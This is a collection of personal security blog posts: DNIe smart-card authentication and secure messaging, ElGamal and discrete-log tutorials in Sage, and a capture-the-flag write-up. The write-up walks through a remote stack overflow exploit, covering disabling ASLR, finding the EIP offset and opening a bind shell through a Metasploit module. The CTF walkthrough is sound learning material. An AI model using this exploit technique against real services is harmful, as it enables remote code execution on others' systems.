Besides the talks, and probably even more important, it was great to meet so many people that I'd only know through the Internet otherwise. Cheers to all of you guys, hope to see you next year at RootedCON or maybe earlier somewhere else

]]>By the way, I updated the previous post with information on how to get the card's serial number.

**Device authentication, quick reminder**

As I said in the previous blog, the device authentication phase consists of the following steps:

- Certificate exchange: The terminal (IFD) requests a X.509 certificate from the card and sends its own certificate and an intermediate CA's certificate to the card
- Internal authenticate: The IFD sends a random challenge to the card and requests it to authenticate itself. This is done with an RSA signature, which is then encrypted for the IFD, and includes a 32 byte random number known as Kicc.
- External authenticate: The terminal authenticates itself, requesting a challenge from the card and sending a signed and encrypted message to the card. Again, this message includes a 32 byte random number known as Kifd.
- Key generation: both ends generate a key for encryption and a key for authentication. This is done by XORing first the two random numbers, and computing then the SHA-1 hash of the result with a constant 1 appended for the encryption key and a constant 2 for the authentication (MAC) key.

So basically at the end of this process, both ends share a pair of keys that can be used for protecting the confidentiality and the integrity of subsequent messages.

Let's see how this is done.

**Confidentiality**

3DES in CBC mode is used for confidentiality of the messages. When the data needs to be encrypted, the message is first padded with a 0x80 byte and as many zero bytes as needed to have a complete number of blocks (i.e. a message length multiple of 8 bytes).

Then 3DES in CBC mode with a null initialization vector is used to encrypt the data. After this, the message is inserted in what is called a *Data Object* in the ISO 7816-4 standard. Concretely, the cryptogram DO used in the E-SIGN specs has a tag equal to 0x87. DOs are a TLV structure, which means they have a Tag identifying the kind of information they carry, a Length byte indicating how many bytes of content they carry, and a Value field with the indicated number of bytes.

In this case, DO 0x87 carries the a Padding Indicator (PI) equal to 0x01 (this indicates the padding described above, starting with 0x80 and continuing with bytes set to 0x00) followed by the cryptogram.

**Authentication**

Authentication of messages is performed using a MAC based on the DES/3DES algorithm. After encrypting the required content, a MAC is computed over the APDU (or TPDU) header and the Data field. It should be noted that the Data field may contain not only DO 0x87 but also other DOs including plain text information, status word information in the case of response APDUs and others.

Before computing any MAC, the Send Sequence Counter is created by concatenating the 4 least significant bytes of RND.ICC and the 4 least significant bytes of RND.IFD. These are the 8 byte challenges created during the authentication process as explained above and in the previous post.

This SSC is used as an initialization vector for the MAC computation, which encrypts the data to be authenticated using DES in CBC mode, except for the last block which is encrypted using 3DES. The output of this last encryption is then used as the MAC. As before, the message is padded with a 0x80 byte and as many zero bytes as needed before applying the encryption process.

Actually, only the 4 most significant bytes of this value are included in the message and they are included in a DO 0x8E. Again, this is a TLV structure, with tag 0x8E, length 0x04 and Value equal to those 4 most significant bytes of the computed MAC.

Finally, the SSC value is incremented for each authenticated message. Therefore, both ends should keep track of the changes to this value in order to provide authenticated messages to the other end and to verify the authentication of incoming messages.

The inclusion of the sequence counter based on the random challenges used in the authentication process allows for protecting the communication against reply attacks even within the same session.

**Next steps**

Again, my goal is to understand how to request an electronic signature to my DNIe. Therefore, the next thing I need to do is implementing this secure messaging layer and authenticate myself to the card using my PIN code. Further, I need to send a signature request with a SHA-1 hash to be signed.

Therefore, in the coming post(s) I'll describe how this process works once Secure Messaging is set up and is used for protecting the communication.

]]>Although I didn't register for the contest, I got a copy of one of the binaries from a friend of mine. I'm sorry to be too late for it, if I had been on time he would have won a 1000 euro prize... but I had no time due to my talk. Sorry dude!

However, yesterday morning I had some spare time after the other guys left the hotel and during my flight, so I gave it a try. Yesterday during one of the talks I did a preliminary reverse engineering session with IDA Pro and quickly spotted the flaw: as the hints said, it was a stack buffer overflow using sprintf() in the say_something function :

```
public say_something
say_something proc near
var_118= dword ptr -118h
var_114= dword ptr -114h
var_110= dword ptr -110h
var_106= byte ptr -106h
var_C= dword ptr -0Ch
arg_0= dword ptr 8
push ebp
mov ebp, esp
sub esp, 118h
mov [esp+118h+var_110], 3E8h
mov [esp+118h+var_114], 0
mov [esp+118h+var_118], offset petete
call _memset
mov [esp+118h+var_110], 3E8h
mov [esp+118h+var_114], offset petete
mov eax, [ebp+arg_0]
mov [esp+118h+var_118], eax
call _read
mov [ebp+var_C], eax
mov eax, offset aHolaS ; "Hola %s"
mov [esp+118h+var_110], offset petete
mov [esp+118h+var_114], eax
lea eax, [ebp+var_106]
mov [esp+118h+var_118], eax
call _sprintf
mov eax, [ebp+var_C]
add eax, 5
mov [esp+118h+var_110], eax
lea eax, [ebp+var_106]
mov [esp+118h+var_114], eax
mov eax, [ebp+arg_0]
mov [esp+118h+var_118], eax
call _write
mov [esp+118h+var_110], 1
mov [esp+118h+var_114], offset asc_8048F3B ; "\n"
mov eax, [ebp+arg_0]
mov [esp+118h+var_118], eax
call _write
leave
retn
say_something endp
```

They also provided an address space map from /proc/pid/maps, where one can see that the stack ends at 0xc0000000, which is the default userspace/kernelspace boundary in Linux x86. This means that ASLR is not enabled, so I just disabled it:

```
# echo 0 > /proc/sys/kernel/randomize_va_space
```

Then, I tried to exploit it launching the binary from the shell. However, the binary goes through several steps before it reaches the vulnerable code path. First it is 'daemonized': it forks and the parent process exists while the child process continues in the background. Not too bad, you can just attach to the child process with gdb, but this is not the interesting process yet. After it is *daemonized*, it does something along the lines of the following C code:

```
if(setuid(0x837)==-1)
die("could not drop privs");
if((pw_struct = getpwuid(0x837))==NULL)
die("Could not get pw entry");
chdir(pw_struct->pw_dir);
```

And then the process creates a socket and binds it to the tcp port 7878 and listens for incoming connections. Once a connection is received, it forks and serves it in the child process, while the parent process just goes back to the listen loop. This last process is the one we'd like to analyze, since this is the one calling our vulnerable function.

All this means that we'll need to do one of two things to reach this vulnerable code during our analysis: either we create a user with the uid needed or we patch the program to bypass these calls or to ask for a different uid. I took the first approach.

So what I did was connecting with netcat and attaching to the last process before sending any data. Then I sent a 300 byte pattern generated with Metasploit's pattern_create.rb:

```
$ nc localhost 7878
```
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9
eloi@EloiLT:~$

This is what happens in gdb:

```
Program received signal SIGSEGV, Segmentation fault.
0x41376941 in ?? ()
```

Great. It seems we control eip and this definitely looks like part of the metasploit pattern. Let's find which part it is:

```
$ ./pattern_offset.rb 41376941 300
261
```

Allright, we have 261 bytes before we hit eip. This is a weird number, but it's due to the fact that it uses sprintf() with 5 characters in front of our input. Now we can use gdb to find where the buffer starts, and we find it at 0xbffff1c2. So this is our current situation: we can enter 261 bytes of data, then we have eip which we control, and then we have still some more room (up to the 1000 bytes read by the daemon from the network).

So, we'll just fill the buffer with junk, then an address in the middle of our nop sled (such as 0xbffff380), then some nops and then our payload. Since we do not have ASLR or anything, this will just work. We use a nop sled to count for the different environment the CTF server would have: a different list of environment variables will make the stack move slightly up or down.

Now we can make a metasploit module for it, and just launch it:

```
msf > use exploit/linux/misc/ctf_rooted
msf exploit(ctf_rooted) > set payload linux/x86/shell_bind_tcp
payload => linux/x86/shell_bind_tcp
msf exploit(ctf_rooted) > set encoder x86/countdown
encoder => x86/countdown
msf exploit(ctf_rooted) > exploit
[*] Started bind handler
[*] Command shell session 1 opened (127.0.0.1:60111 -> 127.0.0.1:2222)
id
uid=1000(eloi) gid=1000(eloi) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),109(lpadmin),115(admin),1000(eloi)
pwd
/tmp
Abort session 1? [y/N] y
```

The metasploit module can be found here. You can see that it is a pretty simple module and it works fine on my local machine. Maybe you need to change something in yours (at the very least, disabling randomize_va_space is required) but it should be very similar or identical.

I did actually fill the buffer with the return address repeated many times because it failed when I was not attached with gdb and wanted to be sure I was overwriting the saved eip. I didn't investigate the reason, just solved it putting the ret address instead of nops and making a slightly bigger nop sled than I had before.

Since it is a remote exploit and the environment may vary greatly from your own machine to the CTF machine, it is possible that some bruteforcing of the return address is needed. Anyway, the daemon continues alive even if your exploit fails, so it should be no problem.

Again, I'm sorry dude I could not help you on time. Anyway, I'm sure you guys had great fun with it!

]]>RootedCON will take place the coming week in Madrid, and I'll be there to present together with Javi some stuff about Android on Saturday. You can see our first slide spoiled by Javi on twitter here: http://twitpic.com/18f6cy

The schedule looks promising and I think we are going to have loads of fun

I'll be there the three days, so if you want to talk to me about anything interesting (info security, side channel analysis, cryptography, whatever...) or have a beer just drop by!

See you there!

]]>The DNIe is a smart card implementing an E-SIGN application. This application is specified by the CWA-14890 documents (where CWA means CEN Workshop Agreement, and CEN means European Committee for Standardization ) and provides an interoperable framework for secure signature devices.

These devices are designed to be used for electronic signatures, and in the Spanish case it has replaced the identity document we have used for many years. It is an ISO 7816 compliant smart card, with (afaik) a custom operating system. The IC has received an EAL5+ Common Criteria certificate issued by the French scheme, while the ICC has been certified by the Spanish scheme and has obtained EAL4+.

This is all public documentation you can find on the Internet:

- EAL5+ CC certificate for the ST19WL34A issued by Serma Technologies in 2005.
- EAL4+ CC certificate for the DNIe OS issued by the CCN.
- ESIGN specifications: CWA14890-1 and CWA14890-2.

These documents show the Common Criteria certificates for the chip and the card, and the specifications of the protocol followed by the card.

Further, the Spanish Administration provides an OpenSC library in binary form, that one can use for communicating with the cards in Linux an Mac OS X. They also provide a CSP for Microsoft Windows. In the remainder of this post I'll explain my attempts at understanding how the device and the protocol work.

Everything has been done with consumer equipment on an Ubuntu 9.10 computer and using public documentation, thus everyone holding an actual DNIe should be able to reproduce these steps. Let's try to understand the details about this thing and how it communicates with our PC. We will start with the Device Authentication phase, which is the first thing that takes place when you use your eID.

Let me remind once again that I do not have access to any confidential information related to the DNIe, and therefore this is all public information. Also, I've done this analysis on my own free time sitting at home and using publicly available tools and a PCSC reader obtained from Tractis.

First things first, we need to install the drivers. To that end I followed the procedure described by the Spanish Administration in www.dnielectronico.es. Once it was working, I authenticated myself against a test website they provide at https://av-dnie.cert.fnmt.es/compruebacert/compruebacert.

The authentication process worked fine, and I was shown some information about myself taken from the digital certificate stored on the card. However, the signature test did not work and it just said "*Your browser could not generate a valid signature*".

Since it always annoys me when I don't know why things fail, I dove into the HTML code and saw the JavaScript they use to ask for a signature. I added a print statement to see the actual error, but it was a very concise "*error: internalError*" message. So my next step was to enable APDU logging in PCSCD (using the -a option ) and take a look at the communication triggered by the use of the *pkcs11-tool* from OpenSC.

Another way for doing it is setting the OPENSC_DEBUG environment variable to 9 and using the OpenSC log to get the APDUs. Yet another way would be using the pkcs11-spy module, but I didn't really try this one.

**A quick smart card (iso7816 APDU) reminder**

As you might know, part of my work involves evaluating smart card security. Therefore I'm quite familiar with the ISO7816 APDU structure and related stuff. However, it might well be that some readers never read a word about APDUs before. Let's make a fast summary with a few facts:

- Smart cards and terminals communicate through APDUs. The terminal requests an action from the card with an APDU request and the card gives a response.
- APDU requests include the following: CLA INS P1 P2 Lc <Data> <Le>. CLA and INS are identifiers of the action you request to the card. P1 and P2 are parameters, Lc is the length of the provided data and Le is the length of the expected response.
- APDU responses include the following: <Data> SW1 SW2. SW1 and SW2 form the so called
*status word*, which gives information on whether the command succeeded or not and why.

Wow! This was fast. You can get more info from Wikipedia, or if you speak Spanish you can take a look at my former Smart card series of posts.

**DNIe: Initial communication analysis**

Ok, my next step was trying to determine why the signing process did not work. Is it something in my Firefox? Something in the binary driver? The card is not behaving in a correct way?

Of course to get an answer I first need to understand how the communication works. So my first attempt at it is to try to sign something using the command line tool *pkcs11-tool* and look at the communication. I'll try to find the PIN I enter in the log to start with...

However, this approach is fundamentally flawed. It assumes that the PIN is sent somehow in plaintext, which is actually not the case. After not understanding anything from the communication at a first glance, I decide to actually look at the specs (see link to CWA14890-1 at the beginning of this post).

It turns out the card and the terminal (PC) establish a *secure channel *before any further communication is performed, and therefore you are not able to see any plaintext information in the log.

**Device authentication**

Let's summarize what happens during the establishment of this *secure/trusted channel*. After receiving the *Answer To Reset *(ATR) from the card, the terminal sends the following APDU:

> 90 B8 00 00 11

At this point, I don't know what this command means. However, I have sent this command several times to the card and verified that the response is static. Also, it doesn't seem very important to me right now, and I'm more interested on what comes next.

**UPDATE** 12/04/2010: Over the weekend I have implemented the authentication protocol explained in this post and found out that this APDU returns the serial number of the card. It's important because it is used in the INTERNAL AUTHENTICATE explained below. One should use the 7 first bytes of the response as the serial number, padding them with a leading 00 byte.

After this, the device authentication process actually starts. This process is described in CWA 14980-1, but I'm going to show how it looks like here. First, the terminal (IFD from now on) issues a SELECT command to select the *Master File*:

> 00 A4 04 00 0B 4D 61 73 74 65 72 2E 46 69 6C 65

< 61 1B > 00 C0 00 00 1B

< 6F 19 84 0B 4D 61 73 74 65 72 2E 46 69 6C 65 85 0A 38 3F 00 00 0B FF FF FF FF FF 90 00

The above means that the terminal selects the master file by its name (Master.File) and the card responds 61 1B, which means *ok, I have 1B bytes of response ready for you*. Then the IFD issues a *GET RESPONSE* command requesting the card to send those 1B bytes.

Now, what happens next is that the card selects another file by its ID (60 1F), which turns out to contain the card certificate for the authentication process:

> 00 A4 00 00 02 60 1F

< 61 0E > 00 C0 00 00 0E

< 6F 0C 85 0A 01 60 1F 03 25 00 FF FF FF FF 90 00

This response shows that the file contains 0x325 bytes of information. The IFD reads them using the *READ BINARY* ISO7816 command in several chunks:

> 00 B0 00 00 F0

< 30 82 03 ... 90 00 > 00 B0 00 F0 F0

< 09 2A 86 ... 90 00 > 00 B0 01 E0 F0

< 97 94 B8 ... 90 00 > 00 B0 02 D0 55

< 2E FE C0 ... 90 00

At this point, the terminal knows the public key of the card and can verify it using the PKI set up by the Spanish authorities. Following this process, the IFD sends a couple of certificates with its own public key and the CA public key in CV (Card Verifiable) form , so that the card can verify them:

> 00 22 81 B6 04 < 4 bytes ID >

< 90 00 > 00 2A 00 AE D2 < certificate1 >

< 90 00 > 00 22 81 B6 0A < 10 bytes ID >

< 90 00 > 00 2A 00 AE D1 < certificate2 >

< 90 00

And now the card also knows the public key of the other end. They are ready to engage in an authentication process now. First the IFD sets the parameters of the authentication process, which includes identifying the keys to be used for authentication and providing the IFD serial number:

> 00 22 C1 A4 12 84 < key ID > 83 0C 00 00 00 00 < IFD Serial number >

< 90 00

And then it sends an *INTERNAL AUTHENTICATE* command. This commands sends a challenge to the card and the IFD serial number sent before. Then, the card will produce a digital signature over these and other values and encrypt it under the IFD's public key provided earlier in the process.

> 00 88 00 00 10 < 8 byte challenge > < IFD Serial Number >

< 61 80 > 00 0C 00 00 80

< encrypted digital signature

Inside this encrypted digital signature, the card has placed it's own 32 byte random number as well as the information provided by the IFD. The inclusion of the challenge ensures that the session is *fresh* and no replay is taking place. The random number sent by the card is later used to generate session keys.

At this point, the IFD can verify that the card is a valid one. This is done by verifying the digital signature received and comparing the random numbers (*nonces*) sent and received. If both verifications succeed, the session is fresh and the other end knows the card's private key. Therefore, assuming the card is secure enough to keep the private key private, the IFD has certainty that it's talking to a valid card.

The next step in the protocol is to authenticate the IFD itself. So far the card has proved it's validity, but the IFD has not. This is the purpose of the *EXTERNAL AUTHENTICATE* command. Similarly to the previous command, now the IFD sends a 32 byte random value which will be used for session key generation.

However, to assure the freshness of this command, the IFD has to request a challenge from the card and include it in the signature. So, the commands that follow now are a *GET CHALLENGE* command and an *EXTERNAL AUTHENTICATE* command:

> 00 84 00 00 08

< < 8 byte challenge > 90 00

> 00 82 00 00 80 < encrypted digital signature >

< 90 00

And now we're done. Before sending this 90 00 response, the card has verified the digital signature from the external authenticate command and compared the nonce with the one it replied to the last get challenge command.

In addition, they share two 32 byte random values, one generated by each end. These two values are only known to them, since they have been encrypted with the other end's public key, and have also been authenticated using digital signatures.

**Session key generation**

After the process described above, the two ends share some secret values and are able to generate shared session keys for subsequent operations.

What they do in this case, is XORing the two 32 byte values ( and respectively) to generate a shared value which is influenced in the same way by both parties. This ensures that no party has complete control over the key (and actually, as long as one of them is random, the result is also random).

Now, this value is concatenated with a constant (1) and hashed with the *SHA-1* algorithm to produce what the specifications name *HASH1*. The same thing is done with a second constant (2) to produce *HASH2*.

The initial 16 bytes of each of this hashes is used as a 3DES key for the subsequent *secure messaging* commands. The first one is used as an encryption key and the second one is used as an authentication key (using MACs).

**Future posts**

This is it for this article. In the future, I want to try to reproduce this steps on my own using some scripting language and try to request a digital signature from my card.

Therefore, you can expect explanations on how *secure messaging* works and how a digital signature is requested to the card. This includes how to perform a *card holder verification* using the PIN code.

Hope you are enjoying it. Feedback is more than welcome!

]]>Now, we are going to see how to make use of that problem to create a public key cryptosystem. We will look at how ElGamal uses the DL problem to provide public key encryption and digital signatures. Keep on reading if you are interested!

**ElGamal encryption**

So we have our friends Alice and Bob wanting to communicate securely. To that end, they first agree on the public settings of the ElGamal cryptosystem. They need a finite cyclic group *G* to work on (such as ) and a generator for that group, *g*. Of course, the group *G* must be a group where computing discrete logarithms is infeasible. Otherwise the system will not work.

With these numbers, Alice and Bob first generate their respective key pairs. First, they generate a random element in G, which will serve as a private key: and respectively. Now, they compute the corresponding secret keys as follows:

in *G*

in *G*

And now they can publish their public keys, , without any fear. Thanks to the difficulty of solving the discrete logarithm in *G*, their respective private keys remain safe even though everyone knows how they were generated.

So, now our friend Alice wants to send some message *m* to Bob. This message is represented as an element in the group *G.* First, she grabs Bob's public key. Then, she generates a random number *r* in the same group *G*. With that number and Bob's public key, she computes the following cryptogram:

It is needless to say that these operations always take place in the group *G*. Now, when Bob receives this message he can compute *m *like this:

This is good news, at least Bob can recover the message knowing . But that doesn't mean that the message will be safe from everyone else.

However, since the DL problem is difficult, it turns out that recovering *r* from *R* is difficult. Therefore, it is not easy to compute from the cryptogram and then recover *m*. It is also difficult to compute Bob's private key from his public key, which would be another way to recover the message.

And also, since *r* was random, *R* is randomized as well as *S*. Thus, an attacker has no information on the structure of the message and the system seems secure under the assumption that the DL problem is hard.

**Example: ElGamal encryption**

Let's continue with our previous example. We take again the same group, and its generator . Alice and Bob compute their respective private and public keys:

`sage: G = IntegerModRing(17627)`

sage: g = G(6)

sage: g.multiplicative_order()

17626

sage: xA = G.random_element()

sage: xB = G.random_element()

sage: hA = g^xA

sage: hB = g^xB

sage: hA

11094

sage: hB

1593

sage:

So now everyone knows the public keys of Alice (11094) and Bob (1593). Now let's imagine that Alice wants to send the message m (1337) to Bob. She has to create a new random number and compute the cryptogram:

`sage: r=G.random_element()`

sage: R = g^r

sage: m=1337

sage: S=hB^r*m

sage: (R,S)

(4831, 8533)

sage:

Alright, now Alice sends this pair of numbers to Bob and he receives it and tries to decrypt them:

`sage: mp = S/(R^xB)`

sage: mp

1337

sage:

Great, it works! However, note that this is not secure against chosen ciphertext attacks and the cryptogram is easily modifiable. For instance, one could modify the decrypted message by modifying only the *S* part of the cryptogram:

`sage: Sp = 3*S`

sage: mp = Sp/(R^xB)

sage: mp

4011

sage: 3*m

4011

sage:

Here an attacker has intercepted the message and modified *S* to be *3S*. This results in the decrypted message being *3m* instead of *m*. However, this kind of properties becomes very useful in multiparty computations such as electronic voting schemes.

**ElGamal signature scheme**

Now we know how to encrypt and decrypt messages using ElGamal. Next step is to see how ElGamal approaches digital signatures. The steps for generating the key pair are the same, i.e. each participant generates a random number as their private key and then computes as their public key.

Now, given a message *m*, Alice will first generate a cryptographic hash H(m). Then, she picks again a random number *r* and computes the following things:

Note that now we used the private key for the generation of the signature. Otherwise, we would not be able to prove that the message is linked to Alice since everyone knows the public key. If *S* turns out to be *0*, Alice has to pick a new random number and compute the signature again.

The verification of the signature is performed by Bob as follows. Bob first computes the message H(m) and then performs the following two calculations:

Due to the way in which the values R and S have been computed, the two results should be the same if the signature and the message have not been modified:

So this tells us that the system is correct, and again in order to forge a signature one would need to either find collisions in the function H (see my post on hash functions) or solve a discrete logarithm. Both problems are believed to be hard. Note that the hash collision must occur over the group *G*, so that .

**Further reading**

Once again, I refer the interested readers to the Handbook of Applied Cryptography for more extensive and accurate information on these topics. In this case, the ElGamal public key system is described in chapter 8, section 8.4.

]]>With symmetric crypto, we could understand the concepts of diffusion and confusion without needing to dive into maths. On the other hand, here we will need to understand the problems on which the algorithms rely in order to understand how they work.

In this post, we'll see what's the Discrete Logarithm problem, why it is difficult to solve based on a simple intuition, and finally a method to solve this kind of problems. Of course it's not the only (nor the best) existing method, but in my opinion it is the simplest one to understand.

**The Discrete Logarithm problem**

As I said before, the Discrete Logarithm problem is formulated as follows. Given a cyclic group G with a generator g, x is called a discrete logarithm of h over this group if it satisfies the following condition:

in G

So this is the equivalent to a logarithm, but instead of computing it over the real numbers it is computed over a finite cyclic group. And now, if you don't have any background on discrete maths, coding theory and the like, you are probably asking something on these lines: *what the hell does that mean?*

To keep it simple, a finite cyclic group G with a generator g means that the successive powers of g (i.e ) will generate the different elements of the group. At some point, after a finite number of elements ( ) the result will cycle over to the first element (i.e. ), and this is what gives the name to the groups ;-). Now, this value, *n*, is called the *order* of the group and is obviously also the number of elements of the group, or cardinality.

I won't go any further with the explanation of the properties of cyclic groups and all the group theory behind this. I'll just say that a simple example of finite cyclic groups is that of the integers modulo some prime number *p*, excluding the zero element. This groups are usually noted as , where *p *is our prime number and the group order is *p-1*.

For instance, say we look at . Then, for this group we get that the group elements are these:

1,2,3,4,5,6

Since those are all the integers modulo 7. Now, a generator of this group would be for instance *g=3*. You can see that in this case the successive powers of 3 modulo 7 are:

1,3,2,6,4,5,1

And there you have that . Therefore, this is a cyclic group of order *p-1=6*.

**Difficulty of the DL problem**

Now, where is the difficulty of the DL problem? We'll just take an intuitive approach to it. When you think of a *classical* logarithm over the real numbers, it turns out that this is a continuous and monotonous function where if . This means that if you know the logarithm of x, and y is pretty close to it, most likely the logarithm of y will be pretty close to it as well.

But when you look at the discrete logarithm, you can see that the behavior of this problem is not as predictable as that of the logarithm function. For instance, in the example above we have that , but . Extrapolating this to big numbers, you can see that it is probably not very easy to go back from a certain power of a prime number to the exponent itself (i.e., computing the DL).

**Solving Discrete Logarithms: Baby Step Giant Step**

All right, now we get to look at an actual method to compute discrete logarithms. The method is called *Baby Step Giant Step* due to the way we approach the problem: we create a table of *a few* powers of our generator: this are our baby steps. Then we take our target problem, and take big steps (of the size of the generated table) downwards until we hit the table. At that point, we know how many steps we took and we can compute the actual logarithm.

But of course, all this may sound like bullshit until you see an actual example. Let's take the following problem, which uses intentionally small numbers:

Given , compute its discrete logarithm in .

Ok, let's start then. We compute a table of a given size, let's say 100 elements. I used to do it with Mathematica, but I do not have it right now so I'm using for the first time ever the Sage open source program. I advise you to install it, because it will also come handy to verify other examples (such as RSA examples) in the future.

So we start by instantiating our cyclic group, and getting a generator and our value *y*:

`sage: G = IntegerModRing(17627)`

sage: g = G(6)

sage: g.multiplicative_order()

17626

sage: y=G(8938)

Now, we build our list of 100 powers and plot it:

sage: powers = [ g^i for i in range(100) ]

sage: list_plot(powers)

Note that *sage* directly applies modular exponentiation since *g* was created as an element of the finite field we are using for this problem. Also, note that the behavior is not really predictable and after a *big *number it often comes a *small* number, but of course not always. You can observe this behavior in the plot obtained:

Ok, let's continue with our search. First, we know that our number, *y*, is part of the finite field, and therefore we can write it as follows:

Where of course *i *is a number below 100. We can further develop this equation and write it the following way:

And here it comes the magic! If you look at this equation, is actually a member of our table of powers. Further, we can compute , which is easy. Then, we can take *y* and multiply it by *a* and check if the result is on the table. In that case, it means that and we can easily compute x!

If it was not the case (which is likely), then we will have to multiply again by *g* as many times as we need until we hit the table. Let's call that number k. At that point, we've found that . Since we know k (it's the number of times we applied our multiplication!) and *i* (we take it from the table), we can compute *x*.

All this can be translated into the following fragment of sage commands:

`sage: j=1`

sage: while not y*a^j in powers: j += 1

....:

sage: j

79

sage: i = powers.index(y*a^j)

sage: i

70

sage: x=100*j+i

sage: x

7970

sage: g^x == y

True

So what you see above means that after 79 steps we have found the value at position 70 in the list. Therefore, the discrete logarithm of *y* in G is *x=7970*. After that, I compare the *x-th* power of *g* with *y* to be sure that the result is correct, and *sage* returns a True. If you happen to know a bit of Python, you can notice that it has a pretty similar syntax (but not identical).

Of course, *sage* also provides easier ways to do it. You can just type *y.log(g)* to solve the problem here:

`sage: y.log(g)`

7970

**Closing thoughts**

The method explained above is not the only one nor the most efficient. Also, as usual the explanations here do not attempt to be a 100% accurate description of the problem from a mathematical point of view (I'm not a mathematician after all) but rather to explain crypto topics in a simple way so that most people can understand it.

If you want to go further with DL problems, get accurate descriptions of it and understand other methods of solving the problem, you can resort (once again) to the Handbook of Applied Cryptography. Specially chapters 2 and 3 treat this and related subjects, covering maths background and reference problems.

I hope you are enjoying these posts and see you soon!

]]>If you are new here, take a look at the About page to know a little more about the guy writing these lines. I'll continue talking about security, cryptography and all that weird stuff I like starting today. Stay tuned!

]]>**Basic idea**

The basic idea behind digital signatures is to make use of the fact that in public key cryptography a user has a **private key** which is **never disclosed to anyone** in order to authenticate the user or messages generated by that user.

In a symmetric setting, authentication is performed using MAC or HMAC mechanisms, and at least two parties know the key used to generate those messages. Therefore, a given party could deny that he or she generated a given authenticated message, because he is not the only one who knows that key and therefore there is no proof that he did generate the message.

Of course, if only two parties know the key, and one of the parties knows that a particular message was not generated by himself, then it must come from the other party. However, in a legal dispute, there is no way to prove that and to an external observer both of the options are equally likely.

To solve that issue, digital signatures generate a sort of authentication code using a private key, never disclosed to anyone. Then, using the related public key, everyone can verify that signature and therefore be sure that the message came from that user. Since that entity is the only one knowing the private key, this sort of construction can be used to bind a user to a message and resolve any legal disputes that might arise.

Normally, you can see the digital signature generation process as some sort of *encryption* with a private key. On the other hand, you can imagine the signature verification (or opening) phase as a *decryption* using the public part of the key.

**Practical usage of digital signatures**

In real world, documents are usually way larger than the message length that common digital signature algorithms can handle directly. Since authenticating each chunk of a document is not very practical (asymmetric crypto is usually slooooow), in practice a cryptographic hash is computed over the document, and the hash is signed using the private key and the signature algorithm.

Then, in the verification stage, a second hash is computed and compared against the signed hash. If they match, the signature is correct and therefore the received document was created by the signing party and has not been modified.

Of course, this assumes that cryptographic hash functions behave as expected, and there are no collisions. Ohterwise, if one might find another document which produces the same hash (and thus the same signature), any legal proof that the document was created by the private key holder would be destroyed.

Therefore, choosing secure hash functions for usage within digital signatures is a crucial issue. As an example problem that arose due to the use of insecure hash functions with digital certificates, check the Hashclash project.

]]>